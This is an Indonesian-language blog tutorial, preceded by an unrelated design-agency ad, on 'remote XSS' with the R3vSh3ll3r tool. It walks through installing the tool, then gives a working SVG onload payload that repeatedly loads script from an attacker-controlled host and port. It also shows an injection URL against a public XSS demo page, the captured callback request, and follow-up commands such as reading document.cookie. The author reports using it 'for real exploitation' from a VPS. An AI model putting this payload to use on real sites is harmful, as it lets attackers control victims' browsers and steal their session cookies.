Remote XSS dengan R3vSh3ll3r (Reverse XSS)

  • Deviant Design Merupakan Layanan Jasa Desain dan Social Media Management Yang Mempunyai Pusat Di Jember. Dengan layanan yang murah, cepat dan pastinya dengan kualitas kelas atas. Mampu mengatur segala kebutuhanmu dalam mengelola social media.
Melakukan remote xss adalah hal yang mungkin dimana attacker dapat mengendalikan payload yang sudah dieksekusi atau ditanam. Bagaimana cara kerja exploit ini? ini memanfaatkan get method dengan interval 1 detik yang artinya server akan melakukan request ke attacker host setiap 1 detik kemudian memperbarui payload yang ditanam. Kenapa dan kapan kita perlu melakukan remote xss? Remote xss dilakukan paling efektif ketika menemukan stored xss dimana hanya dapat melakukan satu kali post payload dan payload tersebut tidak dapat diganti. Meski demikian remote xss dapat digunakan pada reflected xss dimana kita dapat melakukan keystroke injection yang nantinya berujung pada exploitasi tingkat lanjut.

Exploitasi
1.Install R3vSh3ll3r pada komputer atau vps kalian

  • git clone https://github.com/t3rabyt3/R3vSh3ll3r
  • cd R3vSh3ll3r
  • python R3vSh3ll3r.py


Pada pilihan WANT TO USE THIS LHOST? [Y or N]
Pilih Y
Pada pilihan WANT TO USE THIS LPORT? [Y or N]
Pilih Y

2.Sediakan live target
Saya memakai live demo xss dari brute logic http://brutelogic.com.br/xss.php?a=payload

3.Inject payload yang didapat ke situs target



Payload milik saya
<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10.10.1.26:1337"},100);>
Inject ke target
http://brutelogic.com.br/xss.php?a=<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10.10.1.26:1337"},100);>
4.Ketika payload berhasil tereksekusi maka akan menampilkan result seperti berikut:

GET / HTTP/1.1
Host: 10.10.1.26:1337| | | |
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: */*
 untuk commandnya anda bisa memasukan command javascript seperti biasa:

  • alert(1)
  • alert("1")
  • alert('1')
  • alert(document.cookie)
  • dll


Kesimpulan:
  1. Saya melakukan testing pada beberapa browser dan hanya mozilla yang dapat tereksekusi
  1. Saya mencoba menggunakan ngrok namun tidak berfungsi
  1. Saya menggunakan VPS untuk exploitasi secara real dan berfungsi

Preview

Artikel Terbaru